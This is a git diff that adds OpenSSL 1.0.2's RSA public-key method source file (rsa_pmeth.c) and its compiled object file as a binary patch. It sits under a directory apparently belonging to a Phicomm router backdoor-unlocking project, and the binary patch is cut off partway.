+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/rsa.h>
+#include <openssl/bn.h>
+#include <openssl/evp.h>
+#include <openssl/x509v3.h>
+#ifndef OPENSSL_NO_CMS
+# include <openssl/cms.h>
+#endif
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+#include "evp_locl.h"
+#include "rsa_locl.h"
+
+/* RSA pkey context structure */
+
+typedef struct {
+    /* Key gen parameters */
+    int nbits;
+    BIGNUM *pub_exp;
+    /* Keygen callback info */
+    int gentmp[2];
+    /* RSA padding mode */
+    int pad_mode;
+    /* message digest */
+    const EVP_MD *md;
+    /* message digest for MGF1 */
+    const EVP_MD *mgf1md;
+    /* PSS salt length */
+    int saltlen;
+    /* Temp buffer */
+    unsigned char *tbuf;
+    /* OAEP label */
+    unsigned char *oaep_label;
+    size_t oaep_labellen;
+} RSA_PKEY_CTX;
+
+static int pkey_rsa_init(EVP_PKEY_CTX *ctx)
+{
+    RSA_PKEY_CTX *rctx;
+    rctx = OPENSSL_malloc(sizeof(RSA_PKEY_CTX));
+    if (!rctx)
+        return 0;
+    rctx->nbits = 1024;
+    rctx->pub_exp = NULL;
+    rctx->pad_mode = RSA_PKCS1_PADDING;
+    rctx->md = NULL;
+    rctx->mgf1md = NULL;
+    rctx->tbuf = NULL;
+
+    rctx->saltlen = -2;
+
+    rctx->oaep_label = NULL;
+    rctx->oaep_labellen = 0;
+
+    ctx->data = rctx;
+    ctx->keygen_info = rctx->gentmp;
+    ctx->keygen_info_count = 2;
+
+    return 1;
+}
+
+static int pkey_rsa_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    RSA_PKEY_CTX *dctx, *sctx;
+    if (!pkey_rsa_init(dst))
+        return 0;
+    sctx = src->data;
+    dctx = dst->data;
+    dctx->nbits = sctx->nbits;
+    if (sctx->pub_exp) {
+        dctx->pub_exp = BN_dup(sctx->pub_exp);
+        if (!dctx->pub_exp)
+            return 0;
+    }
+    dctx->pad_mode = sctx->pad_mode;
+    dctx->md = sctx->md;
+    dctx->mgf1md = sctx->mgf1md;
+    if (sctx->oaep_label) {
+        if (dctx->oaep_label)
+            OPENSSL_free(dctx->oaep_label);
+        dctx->oaep_label = BUF_memdup(sctx->oaep_label, sctx->oaep_labellen);
+        if (!dctx->oaep_label)
+            return 0;
+        dctx->oaep_labellen = sctx->oaep_labellen;
+    }
+    return 1;
+}
+
+static int setup_tbuf(RSA_PKEY_CTX *ctx, EVP_PKEY_CTX *pk)
+{
+    if (ctx->tbuf)
+        return 1;
+    ctx->tbuf = OPENSSL_malloc(EVP_PKEY_size(pk->pkey));
+    if (!ctx->tbuf)
+        return 0;
+    return 1;
+}
+
+static void pkey_rsa_cleanup(EVP_PKEY_CTX *ctx)
+{
+    RSA_PKEY_CTX *rctx = ctx->data;
+    if (rctx) {
+        if (rctx->pub_exp)
+            BN_free(rctx->pub_exp);
+        if (rctx->tbuf)
+            OPENSSL_free(rctx->tbuf);
+        if (rctx->oaep_label)
+            OPENSSL_free(rctx->oaep_label);
+        OPENSSL_free(rctx);
+    }
+}
+
+#ifdef OPENSSL_FIPS
+/*
+ * FIP checker. Return value indicates status of context parameters: 1 :
+ * redirect to FIPS. 0 : don't redirect to FIPS. -1 : illegal operation in
+ * FIPS mode.
+ */
+
+static int pkey_fips_check_ctx(EVP_PKEY_CTX *ctx)
+{
+    RSA_PKEY_CTX *rctx = ctx->data;
+    RSA *rsa = ctx->pkey->pkey.rsa;
+    int rv = -1;
+    if (!FIPS_mode())
+        return 0;
+    if (rsa->flags & RSA_FLAG_NON_FIPS_ALLOW)
+        rv = 0;
+    if (!(rsa->meth->flags & RSA_FLAG_FIPS_METHOD) && rv)
+        return -1;
+    if (rctx->md) {
+        const EVP_MD *fmd;
+        fmd = FIPS_get_digestbynid(EVP_MD_type(rctx->md));
+        if (!fmd || !(fmd->flags & EVP_MD_FLAG_FIPS))
+            return rv;
+    }
+    if (rctx->mgf1md && !(rctx->mgf1md->flags & EVP_MD_FLAG_FIPS)) {
+        const EVP_MD *fmd;
+        fmd = FIPS_get_digestbynid(EVP_MD_type(rctx->mgf1md));
+        if (!fmd || !(fmd->flags & EVP_MD_FLAG_FIPS))
+            return rv;
+    }
+    return 1;
+}
+#endif
+
+static int pkey_rsa_sign(EVP_PKEY_CTX *ctx, unsigned char *sig,
+                         size_t *siglen, const unsigned char *tbs,
+                         size_t tbslen)
+{
+    int ret;
+    RSA_PKEY_CTX *rctx = ctx->data;
+    RSA *rsa = ctx->pkey->pkey.rsa;
+
+#ifdef OPENSSL_FIPS
+    ret = pkey_fips_check_ctx(ctx);
+    if (ret < 0) {
+        RSAerr(RSA_F_PKEY_RSA_SIGN, RSA_R_OPERATION_NOT_ALLOWED_IN_FIPS_MODE);
+        return -1;
+    }
+#endif
+
+    if (rctx->md) {
+        if (tbslen != (size_t)EVP_MD_size(rctx->md)) {
+            RSAerr(RSA_F_PKEY_RSA_SIGN, RSA_R_INVALID_DIGEST_LENGTH);
+            return -1;
+        }
+#ifdef OPENSSL_FIPS
+        if (ret > 0) {
+            unsigned int slen;
+            ret = FIPS_rsa_sign_digest(rsa, tbs, tbslen, rctx->md,
+                                       rctx->pad_mode,
+                                       rctx->saltlen,
+                                       rctx->mgf1md, sig, &slen);
+            if (ret > 0)
+                *siglen = slen;
+            else
+                *siglen = 0;
+            return ret;
+        }
+#endif
+
+        if (EVP_MD_type(rctx->md) == NID_mdc2) {
+            unsigned int sltmp;
+            if (rctx->pad_mode != RSA_PKCS1_PADDING)
+                return -1;
+            ret = RSA_sign_ASN1_OCTET_STRING(NID_mdc2,
+                                             tbs, tbslen, sig, &sltmp, rsa);
+
+            if (ret <= 0)
+                return ret;
+            ret = sltmp;
+        } else if (rctx->pad_mode == RSA_X931_PADDING) {
+            if (!setup_tbuf(rctx, ctx))
+                return -1;
+            memcpy(rctx->tbuf, tbs, tbslen);
+            rctx->tbuf[tbslen] = RSA_X931_hash_id(EVP_MD_type(rctx->md));
+            ret = RSA_private_encrypt(tbslen + 1, rctx->tbuf,
+                                      sig, rsa, RSA_X931_PADDING);
+        } else if (rctx->pad_mode == RSA_PKCS1_PADDING) {
+            unsigned int sltmp;
+            ret = RSA_sign(EVP_MD_type(rctx->md),
+                           tbs, tbslen, sig, &sltmp, rsa);
+            if (ret <= 0)
+                return ret;
+            ret = sltmp;
+        } else if (rctx->pad_mode == RSA_PKCS1_PSS_PADDING) {
+            if (!setup_tbuf(rctx, ctx))
+                return -1;
+            if (!RSA_padding_add_PKCS1_PSS_mgf1(rsa,
+                                                rctx->tbuf, tbs,
+                                                rctx->md, rctx->mgf1md,
+                                                rctx->saltlen))
+                return -1;
+            ret = RSA_private_encrypt(RSA_size(rsa), rctx->tbuf,
+                                      sig, rsa, RSA_NO_PADDING);
+        } else
+            return -1;
+    } else
+        ret = RSA_private_encrypt(tbslen, tbs, sig, ctx->pkey->pkey.rsa,
+                                  rctx->pad_mode);
+    if (ret < 0)
+        return ret;
+    *siglen = ret;
+    return 1;
+}
+
+static int pkey_rsa_verifyrecover(EVP_PKEY_CTX *ctx,
+                                  unsigned char *rout, size_t *routlen,
+                                  const unsigned char *sig, size_t siglen)
+{
+    int ret;
+    RSA_PKEY_CTX *rctx = ctx->data;
+
+    if (rctx->md) {
+        if (rctx->pad_mode == RSA_X931_PADDING) {
+            if (!setup_tbuf(rctx, ctx))
+                return -1;
+            ret = RSA_public_decrypt(siglen, sig,
+                                     rctx->tbuf, ctx->pkey->pkey.rsa,
+                                     RSA_X931_PADDING);
+            if (ret < 1)
+                return 0;
+            ret--;
+            if (rctx->tbuf[ret] != RSA_X931_hash_id(EVP_MD_type(rctx->md))) {
+                RSAerr(RSA_F_PKEY_RSA_VERIFYRECOVER,
+                       RSA_R_ALGORITHM_MISMATCH);
+                return 0;
+            }
+            if (ret != EVP_MD_size(rctx->md)) {
+                RSAerr(RSA_F_PKEY_RSA_VERIFYRECOVER,
+                       RSA_R_INVALID_DIGEST_LENGTH);
+                return 0;
+            }
+            if (rout)
+                memcpy(rout, rctx->tbuf, ret);
+        } else if (rctx->pad_mode == RSA_PKCS1_PADDING) {
+            size_t sltmp;
+            ret = int_rsa_verify(EVP_MD_type(rctx->md),
+                                 NULL, 0, rout, &sltmp,
+                                 sig, siglen, ctx->pkey->pkey.rsa);
+            if (ret <= 0)
+                return 0;
+            ret = sltmp;
+        } else
+            return -1;
+    } else
+        ret = RSA_public_decrypt(siglen, sig, rout, ctx->pkey->pkey.rsa,
+                                 rctx->pad_mode);
+    if (ret < 0)
+        return ret;
+    *routlen = ret;
+    return 1;
+}
+
+static int pkey_rsa_verify(EVP_PKEY_CTX *ctx,
+                           const unsigned char *sig, size_t siglen,
+                           const unsigned char *tbs, size_t tbslen)
+{
+    RSA_PKEY_CTX *rctx = ctx->data;
+    RSA *rsa = ctx->pkey->pkey.rsa;
+    size_t rslen;
+#ifdef OPENSSL_FIPS
+    int rv;
+    rv = pkey_fips_check_ctx(ctx);
+    if (rv < 0) {
+        RSAerr(RSA_F_PKEY_RSA_VERIFY,
+               RSA_R_OPERATION_NOT_ALLOWED_IN_FIPS_MODE);
+        return -1;
+    }
+#endif
+    if (rctx->md) {
+#ifdef OPENSSL_FIPS
+        if (rv > 0) {
+            return FIPS_rsa_verify_digest(rsa,
+                                          tbs, tbslen,
+                                          rctx->md,
+                                          rctx->pad_mode,
+                                          rctx->saltlen,
+                                          rctx->mgf1md, sig, siglen);
+
+        }
+#endif
+        if (rctx->pad_mode == RSA_PKCS1_PADDING)
+            return RSA_verify(EVP_MD_type(rctx->md), tbs, tbslen,
+                              sig, siglen, rsa);
+        if (rctx->pad_mode == RSA_X931_PADDING) {
+            if (pkey_rsa_verifyrecover(ctx, NULL, &rslen, sig, siglen) <= 0)
+                return 0;
+        } else if (rctx->pad_mode == RSA_PKCS1_PSS_PADDING) {
+            int ret;
+            if (!setup_tbuf(rctx, ctx))
+                return -1;
+            ret = RSA_public_decrypt(siglen, sig, rctx->tbuf,
+                                     rsa, RSA_NO_PADDING);
+            if (ret <= 0)
+                return 0;
+            ret = RSA_verify_PKCS1_PSS_mgf1(rsa, tbs,
+                                            rctx->md, rctx->mgf1md,
+                                            rctx->tbuf, rctx->saltlen);
+            if (ret <= 0)
+                return 0;
+            return 1;
+        } else
+            return -1;
+    } else {
+        if (!setup_tbuf(rctx, ctx))
+            return -1;
+        rslen = RSA_public_decrypt(siglen, sig, rctx->tbuf,
+                                   rsa, rctx->pad_mode);
+        if (rslen == 0)
+            return 0;
+    }
+
+    if ((rslen != tbslen) || memcmp(tbs, rctx->tbuf, rslen))
+        return 0;
+
+    return 1;
+
+}
+
+static int pkey_rsa_encrypt(EVP_PKEY_CTX *ctx,
+                            unsigned char *out, size_t *outlen,
+                            const unsigned char *in, size_t inlen)
+{
+    int ret;
+    RSA_PKEY_CTX *rctx = ctx->data;
+    if (rctx->pad_mode == RSA_PKCS1_OAEP_PADDING) {
+        int klen = RSA_size(ctx->pkey->pkey.rsa);
+        if (!setup_tbuf(rctx, ctx))
+            return -1;
+        if (!RSA_padding_add_PKCS1_OAEP_mgf1(rctx->tbuf, klen,
+                                             in, inlen,
+                                             rctx->oaep_label,
+                                             rctx->oaep_labellen,
+                                             rctx->md, rctx->mgf1md))
+            return -1;
+        ret = RSA_public_encrypt(klen, rctx->tbuf, out,
+                                 ctx->pkey->pkey.rsa, RSA_NO_PADDING);
+    } else
+        ret = RSA_public_encrypt(inlen, in, out, ctx->pkey->pkey.rsa,
+                                 rctx->pad_mode);
+    if (ret < 0)
+        return ret;
+    *outlen = ret;
+    return 1;
+}
+
+static int pkey_rsa_decrypt(EVP_PKEY_CTX *ctx,
+                            unsigned char *out, size_t *outlen,
+                            const unsigned char *in, size_t inlen)
+{
+    int ret;
+    RSA_PKEY_CTX *rctx = ctx->data;
+    if (rctx->pad_mode == RSA_PKCS1_OAEP_PADDING) {
+        int i;
+        if (!setup_tbuf(rctx, ctx))
+            return -1;
+        ret = RSA_private_decrypt(inlen, in, rctx->tbuf,
+                                  ctx->pkey->pkey.rsa, RSA_NO_PADDING);
+        if (ret <= 0)
+            return ret;
+        for (i = 0; i < ret; i++) {
+            if (rctx->tbuf[i])
+                break;
+        }
+        ret = RSA_padding_check_PKCS1_OAEP_mgf1(out, ret, rctx->tbuf + i,
+                                                ret - i, ret,
+                                                rctx->oaep_label,
+                                                rctx->oaep_labellen,
+                                                rctx->md, rctx->mgf1md);
+    } else
+        ret = RSA_private_decrypt(inlen, in, out, ctx->pkey->pkey.rsa,
+                                  rctx->pad_mode);
+    if (ret < 0)
+        return ret;
+    *outlen = ret;
+    return 1;
+}
+
+static int check_padding_md(const EVP_MD *md, int padding)
+{
+    if (!md)
+        return 1;
+
+    if (padding == RSA_NO_PADDING) {
+        RSAerr(RSA_F_CHECK_PADDING_MD, RSA_R_INVALID_PADDING_MODE);
+        return 0;
+    }
+
+    if (padding == RSA_X931_PADDING) {
+        if (RSA_X931_hash_id(EVP_MD_type(md)) == -1) {
+            RSAerr(RSA_F_CHECK_PADDING_MD, RSA_R_INVALID_X931_DIGEST);
+            return 0;
+        }
+        return 1;
+    }
+
+    return 1;
+}
+
+static int pkey_rsa_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    RSA_PKEY_CTX *rctx = ctx->data;
+    switch (type) {
+    case EVP_PKEY_CTRL_RSA_PADDING:
+        if ((p1 >= RSA_PKCS1_PADDING) && (p1 <= RSA_PKCS1_PSS_PADDING)) {
+            if (!check_padding_md(rctx->md, p1))
+                return 0;
+            if (p1 == RSA_PKCS1_PSS_PADDING) {
+                if (!(ctx->operation &
+                      (EVP_PKEY_OP_SIGN | EVP_PKEY_OP_VERIFY)))
+                    goto bad_pad;
+                if (!rctx->md)
+                    rctx->md = EVP_sha1();
+            }
+            if (p1 == RSA_PKCS1_OAEP_PADDING) {
+                if (!(ctx->operation & EVP_PKEY_OP_TYPE_CRYPT))
+                    goto bad_pad;
+                if (!rctx->md)
+                    rctx->md = EVP_sha1();
+            }
+            rctx->pad_mode = p1;
+            return 1;
+        }
+ bad_pad:
+        RSAerr(RSA_F_PKEY_RSA_CTRL,
+               RSA_R_ILLEGAL_OR_UNSUPPORTED_PADDING_MODE);
+        return -2;
+
+    case EVP_PKEY_CTRL_GET_RSA_PADDING:
+        *(int *)p2 = rctx->pad_mode;
+        return 1;
+
+    case EVP_PKEY_CTRL_RSA_PSS_SALTLEN:
+    case EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN:
+        if (rctx->pad_mode != RSA_PKCS1_PSS_PADDING) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL, RSA_R_INVALID_PSS_SALTLEN);
+            return -2;
+        }
+        if (type == EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN)
+            *(int *)p2 = rctx->saltlen;
+        else {
+            if (p1 < -2)
+                return -2;
+            rctx->saltlen = p1;
+        }
+        return 1;
+
+    case EVP_PKEY_CTRL_RSA_KEYGEN_BITS:
+        if (p1 < 256) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL, RSA_R_INVALID_KEYBITS);
+            return -2;
+        }
+        rctx->nbits = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_RSA_KEYGEN_PUBEXP:
+        if (!p2)
+            return -2;
+        BN_free(rctx->pub_exp);
+        rctx->pub_exp = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_RSA_OAEP_MD:
+    case EVP_PKEY_CTRL_GET_RSA_OAEP_MD:
+        if (rctx->pad_mode != RSA_PKCS1_OAEP_PADDING) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL, RSA_R_INVALID_PADDING_MODE);
+            return -2;
+        }
+        if (type == EVP_PKEY_CTRL_GET_RSA_OAEP_MD)
+            *(const EVP_MD **)p2 = rctx->md;
+        else
+            rctx->md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_MD:
+        if (!check_padding_md(p2, rctx->pad_mode))
+            return 0;
+        rctx->md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_MD:
+        *(const EVP_MD **)p2 = rctx->md;
+        return 1;
+
+    case EVP_PKEY_CTRL_RSA_MGF1_MD:
+    case EVP_PKEY_CTRL_GET_RSA_MGF1_MD:
+        if (rctx->pad_mode != RSA_PKCS1_PSS_PADDING
+            && rctx->pad_mode != RSA_PKCS1_OAEP_PADDING) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL, RSA_R_INVALID_MGF1_MD);
+            return -2;
+        }
+        if (type == EVP_PKEY_CTRL_GET_RSA_MGF1_MD) {
+            if (rctx->mgf1md)
+                *(const EVP_MD **)p2 = rctx->mgf1md;
+            else
+                *(const EVP_MD **)p2 = rctx->md;
+        } else
+            rctx->mgf1md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_RSA_OAEP_LABEL:
+        if (rctx->pad_mode != RSA_PKCS1_OAEP_PADDING) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL, RSA_R_INVALID_PADDING_MODE);
+            return -2;
+        }
+        if (rctx->oaep_label)
+            OPENSSL_free(rctx->oaep_label);
+        if (p2 && p1 > 0) {
+            rctx->oaep_label = p2;
+            rctx->oaep_labellen = p1;
+        } else {
+            rctx->oaep_label = NULL;
+            rctx->oaep_labellen = 0;
+        }
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_RSA_OAEP_LABEL:
+        if (rctx->pad_mode != RSA_PKCS1_OAEP_PADDING) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL, RSA_R_INVALID_PADDING_MODE);
+            return -2;
+        }
+        *(unsigned char **)p2 = rctx->oaep_label;
+        return rctx->oaep_labellen;
+
+    case EVP_PKEY_CTRL_DIGESTINIT:
+    case EVP_PKEY_CTRL_PKCS7_ENCRYPT:
+    case EVP_PKEY_CTRL_PKCS7_DECRYPT:
+    case EVP_PKEY_CTRL_PKCS7_SIGN:
+        return 1;
+#ifndef OPENSSL_NO_CMS
+    case EVP_PKEY_CTRL_CMS_DECRYPT:
+    case EVP_PKEY_CTRL_CMS_ENCRYPT:
+    case EVP_PKEY_CTRL_CMS_SIGN:
+        return 1;
+#endif
+    case EVP_PKEY_CTRL_PEER_KEY:
+        RSAerr(RSA_F_PKEY_RSA_CTRL,
+               RSA_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+
+    default:
+        return -2;
+
+    }
+}
+
+static int pkey_rsa_ctrl_str(EVP_PKEY_CTX *ctx,
+                             const char *type, const char *value)
+{
+    if (!value) {
+        RSAerr(RSA_F_PKEY_RSA_CTRL_STR, RSA_R_VALUE_MISSING);
+        return 0;
+    }
+    if (!strcmp(type, "rsa_padding_mode")) {
+        int pm;
+        if (!strcmp(value, "pkcs1"))
+            pm = RSA_PKCS1_PADDING;
+        else if (!strcmp(value, "sslv23"))
+            pm = RSA_SSLV23_PADDING;
+        else if (!strcmp(value, "none"))
+            pm = RSA_NO_PADDING;
+        else if (!strcmp(value, "oeap"))
+            pm = RSA_PKCS1_OAEP_PADDING;
+        else if (!strcmp(value, "oaep"))
+            pm = RSA_PKCS1_OAEP_PADDING;
+        else if (!strcmp(value, "x931"))
+            pm = RSA_X931_PADDING;
+        else if (!strcmp(value, "pss"))
+            pm = RSA_PKCS1_PSS_PADDING;
+        else {
+            RSAerr(RSA_F_PKEY_RSA_CTRL_STR, RSA_R_UNKNOWN_PADDING_TYPE);
+            return -2;
+        }
+        return EVP_PKEY_CTX_set_rsa_padding(ctx, pm);
+    }
+
+    if (!strcmp(type, "rsa_pss_saltlen")) {
+        int saltlen;
+        saltlen = atoi(value);
+        return EVP_PKEY_CTX_set_rsa_pss_saltlen(ctx, saltlen);
+    }
+
+    if (!strcmp(type, "rsa_keygen_bits")) {
+        int nbits;
+        nbits = atoi(value);
+        return EVP_PKEY_CTX_set_rsa_keygen_bits(ctx, nbits);
+    }
+
+    if (!strcmp(type, "rsa_keygen_pubexp")) {
+        int ret;
+        BIGNUM *pubexp = NULL;
+        if (!BN_asc2bn(&pubexp, value))
+            return 0;
+        ret = EVP_PKEY_CTX_set_rsa_keygen_pubexp(ctx, pubexp);
+        if (ret <= 0)
+            BN_free(pubexp);
+        return ret;
+    }
+
+    if (!strcmp(type, "rsa_mgf1_md")) {
+        const EVP_MD *md;
+        if (!(md = EVP_get_digestbyname(value))) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL_STR, RSA_R_INVALID_DIGEST);
+            return 0;
+        }
+        return EVP_PKEY_CTX_set_rsa_mgf1_md(ctx, md);
+    }
+
+    if (!strcmp(type, "rsa_oaep_md")) {
+        const EVP_MD *md;
+        if (!(md = EVP_get_digestbyname(value))) {
+            RSAerr(RSA_F_PKEY_RSA_CTRL_STR, RSA_R_INVALID_DIGEST);
+            return 0;
+        }
+        return EVP_PKEY_CTX_set_rsa_oaep_md(ctx, md);
+    }
+    if (!strcmp(type, "rsa_oaep_label")) {
+        unsigned char *lab;
+        long lablen;
+        int ret;
+        lab = string_to_hex(value, &lablen);
+        if (!lab)
+            return 0;
+        ret = EVP_PKEY_CTX_set0_rsa_oaep_label(ctx, lab, lablen);
+        if (ret <= 0)
+            OPENSSL_free(lab);
+        return ret;
+    }
+
+    return -2;
+}
+
+static int pkey_rsa_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    RSA *rsa = NULL;
+    RSA_PKEY_CTX *rctx = ctx->data;
+    BN_GENCB *pcb, cb;
+    int ret;
+    if (!rctx->pub_exp) {
+        rctx->pub_exp = BN_new();
+        if (!rctx->pub_exp || !BN_set_word(rctx->pub_exp, RSA_F4))
+            return 0;
+    }
+    rsa = RSA_new();
+    if (!rsa)
+        return 0;
+    if (ctx->pkey_gencb) {
+        pcb = &cb;
+        evp_pkey_set_cb_translate(pcb, ctx);
+    } else
+        pcb = NULL;
+    ret = RSA_generate_key_ex(rsa, rctx->nbits, rctx->pub_exp, pcb);
+    if (ret > 0)
+        EVP_PKEY_assign_RSA(pkey, rsa);
+    else
+        RSA_free(rsa);
+    return ret;
+}
+
+const EVP_PKEY_METHOD rsa_pkey_meth = {
+    EVP_PKEY_RSA,
+    EVP_PKEY_FLAG_AUTOARGLEN,
+    pkey_rsa_init,
+    pkey_rsa_copy,
+    pkey_rsa_cleanup,
+
+    0, 0,
+
+    0,
+    pkey_rsa_keygen,
+
+    0,
+    pkey_rsa_sign,
+
+    0,
+    pkey_rsa_verify,
+
+    0,
+    pkey_rsa_verifyrecover,
+
+    0, 0, 0, 0,
+
+    0,
+    pkey_rsa_encrypt,
+
+    0,
+    pkey_rsa_decrypt,
+
+    0, 0,
+
+    pkey_rsa_ctrl,
+    pkey_rsa_ctrl_str
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pmeth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rsa/rsa_pmeth.o
new file mode 100644
index 0000000000000000000000000000000000000000..850ee1b780dddde435e90de2b1964943d21633b6
GIT binary patch
literal 13112
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
